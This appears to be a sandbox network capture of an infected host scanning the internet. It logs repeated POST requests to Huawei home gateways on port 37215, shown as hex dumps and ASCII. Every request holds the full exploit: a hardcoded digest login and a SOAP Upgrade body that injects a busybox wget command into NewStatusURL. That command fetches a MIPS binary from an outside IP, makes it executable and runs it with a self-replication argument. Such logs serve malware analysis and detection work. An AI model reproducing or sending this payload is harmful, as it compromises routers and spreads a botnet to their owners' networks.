                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          615192.168.2.234311857.57.179.20637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.213989973 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          616192.168.2.2358962197.135.63.237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.213990927 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          617192.168.2.2349894157.254.196.18737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.213990927 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          618192.168.2.235549641.153.54.5437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.214020967 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          619192.168.2.235747241.18.177.11437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.214112997 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          620192.168.2.2345544157.84.130.7637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.214116096 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          621192.168.2.2344904197.51.96.11437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.214128971 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          622192.168.2.234983641.103.81.6837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.214133024 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          623192.168.2.235025041.165.93.2137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.214148045 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          624192.168.2.2346052116.242.236.20337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.214154959 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
